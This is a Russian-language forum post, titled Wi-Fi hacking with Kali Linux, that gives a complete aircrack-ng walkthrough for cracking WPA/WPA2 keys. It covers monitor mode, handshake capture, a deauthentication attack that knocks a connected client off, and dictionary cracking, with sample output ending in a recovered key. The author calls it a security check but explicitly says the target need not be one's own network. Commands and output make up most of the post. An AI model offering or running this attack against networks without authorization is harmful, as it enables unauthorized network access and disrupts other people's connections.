Взлом wi-fi. Kali linux

D32R

Пользователь
Регистрация
24.03.14
Сообщения
8
Реакции
0
Баллы
1
Адрес
kazakstan.lisakovsk
D этой статье мы попробуем "проверить на безопасность" свою собственную беспроводную точку (Можно не свою)доступа в интернет. И так, приступим...
Шаг 1 - запуск беспроводного интерфейса в режиме мониторинга
Цель этого шага в том, чтобы запустить вашу wi-fi карту в так называемом режиме мониторинга. Данный режим позволяет вам «слушать» все пакеты, т. е. Не только те которые адресованы вашей карте.
Точная процедура включения режима монитора отличается в зависимости от используемого драйвера. Для определения драйвера, выполните следующую команду:
airmon-ng
На машине с Ralink, Atheros и Broadcom система выдаст примерно следующее:
Interface Chipset Driver

rausb0 Ralink RT73 rt73
wlan0 Broadcom b43 - [phy0]
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)

Шаг 1а - Настройка MadWifi -NG
Сперва остановим ath0, выполнив:
airmon-ng stop ath0
Должно быть так:
Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Выполните команду "iwconfig", чтобы убедиться в том, что больше никаких интерфейсов athX не запущено. Это должно выглядеть примерно так:
lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

Теперь введите следующую команду, чтобы переключить беспроводную карту на канал 9 в режиме мониторинга:
airmon-ng start wifi0 9
После этой команды мы должны увидеть что-то похожее на:
Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Теперь убедимся что наш интерфейс правильно настроен, снова выполняем команду iwconfig
Ответ должен выглядеть так:
lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:eek:ff RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Шаг 1b - Настройка драйверов mac80211
airmon-ng start wlan0 9
Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)

Обратите внимание, что монитор включен на mon0.
Стадия 1С — Настройка прочих драйверов
Для других ( ieee80211 основе ) драйверов, просто выполните следующую команду, чтобы включить режим мониторинга (замените rausb0 вашим именем интерфейса):
airmon-ng start rausb0 9
Результат
Interface Chipset Driver

rausb0 Ralink rt73 (monitor mode enabled)

Шаг 2 — Начало. Сбор хэндшейков.
Целью этого шага является сбор т. н. рукопожатий
Выполняем:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
Где:
· -с 9 является каналом для беспроводной сети
· - BSSID 00:14:6 C: 7E : 40:80 является MAC адресом точки доступа.
· -w psk является префиксом имени файла вывода
· ath0 является именем нашего интерфейса.
Вот какой будет вывод если беспроводной клиент подключится к сети:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

А вот так если не подключится:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

Данный шаг может затянуться, и вам придется ждать пока кто-то из клиентов не подключится к точке доступа. Но думаю это не проблема.
На основании вывода Airodump-ng в предыдущем шаге, вам удалось определить клиента, который в данный момент подключен. Нам понадобится его MAC-адрес.
Откройте другой сеанс консоли и введите:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
Где:
· -0 средство деаутентификации
· 1 число деаутентификаций для отправки ( вы можете отправить несколько , если хотите)
· -a 00:14:6C:7E:40:80 МАС-адрес точки доступа
· -c 00:0F:B5:FD:FB:C2 МАС-адрес клиента которого мы обнаружили
· ath0 имя интерфейса
Вот как будет выглядеть результат команды:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
Шаг 4 — Aircrack-ng - взлом предварительного ключа
На данном этапе нам нужно взломать предварительный ключ WPA/WPA2. Чтобы сделать это, нам понадобиться словарь слов в качестве входных данных.
Существует небольшой словарь, который поставляется с aircrack-ng - “password.lst”. Будем использовать его.
Откройте другой сеанс консоли и введите:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
Где:
-w password.lst это имя файла словаря
*.cap название группы файлов, содержащих перехваченные пакеты . Обратите внимание, что в данном случае мы использовали специальный символ *, чтобы включить несколько файлов.

Вот типичный вывод, когда нет хэндшейков:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

No valid WPA handshakes found.

Когда это происходит, вы должны либо повторить шаг 3 или ждать дольше, если вы используете пассивный подход.
Вот таким может быть вывод если хэндшейк будет найден:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target.

Теперь в этот момент, Aircrack-ng начнет пытаться взломать предварительный ключ. В зависимости от скорости вашего процессора и размера словаря, это может занять много времени.
Вот таким будет вывод при успешном взломе:
Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


Ну вот, ключ у нас. Беспроводная сеть проверена на безопасность ;)
 

Статистика форума

Темы
205.157
Сообщения
386.546
Пользователи
327.908
Новый пользователь
zloix3mal
Сверху Снизу